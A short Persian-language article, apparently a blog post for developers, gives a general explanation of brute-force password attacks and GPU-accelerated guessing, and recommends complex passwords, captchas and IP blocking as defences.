    Brute Force یک حمله brute-force مبتنی بر کلمه عبور با استفاده از برنامه های خاص است. لغت نامه ها می توانند متفاوت باشند: لاتین، مرتب سازی بر اساس اعداد، فرض کنید تا محدوده ای، ترکیبی (لاتین + اعداد)، و حتی فرهنگ لغت هایی با نمادهای منحصر به فرد @#4$%&*~~`'”\ ? و غیره.

    البته اجتناب از این نوع حمله به راحتی امکان پذیر است کافی است یک رمز عبور پیچیده ارائه دهید. حتی کپچا هم می تواند شما را نجات دهد. و همچنین، اگر سایت شما بر روی CMS ساخته شده است، بسیاری از آنها نوع مشابهی از حمله را محاسبه کرده و ip را مسدود می کنند. همیشه باید به یاد داشته باشیم که هر چه کاراکترهای مختلف رمز عبور بیشتر باشد، انتخاب آن سخت‌تر می‌شود.

    هکرها چگونه کار می کنند؟ در بیشتر موارد، آنها مشکوک هستند یا از قبل بخشی از رمز عبور را می دانند. کاملاً منطقی است که فرض کنیم رمز عبور کاربر مطمئناً شامل 3 یا 5 کاراکتر نخواهد بود. چنین پسوردهایی منجر به هک های مکرر می شوند. اصولاً هکرها محدوده ای بین 5 تا 10 کاراکتر را انتخاب می کنند و چند کاراکتر را که احتمالاً از قبل می دانند به آن اضافه می کنند. در مرحله بعد، رمزهای عبور با محدوده مورد نظر ایجاد کنید. توزیع لینوکس کالی حتی برنامه هایی برای چنین مواردی دارد. و voila، حمله دیگر طولانی نخواهد بود، زیرا حجم فرهنگ لغت دیگر زیاد نیست. علاوه بر این، یک هکر می تواند از قدرت کارت گرافیک استفاده کند. برخی از آنها از سیستم CUDA پشتیبانی می کنند، در حالی که سرعت شمارش تا 10 برابر افزایش می یابد. و اکنون می بینیم که حمله به این روش ساده کاملا واقعی است. اما نه تنها سایت ها در معرض زور وحشیانه قرار می گیرند.

    توسعه دهندگان عزیز هرگز سیستم امنیت اطلاعات را فراموش نکنید، زیرا امروزه بسیاری از مردم از جمله ایالت ها از این نوع حملات رنج می برند. به هر حال، بزرگترین آسیب پذیری شخصی است که همیشه می تواند در جایی حواسش پرت شود یا جایی را نادیده بگیرد. ما برنامه نویس هستیم، اما ماشین های برنامه ریزی شده نیستیم. همیشه هوشیار باشید، زیرا از دست دادن اطلاعات عواقب جدی را تهدید می کند!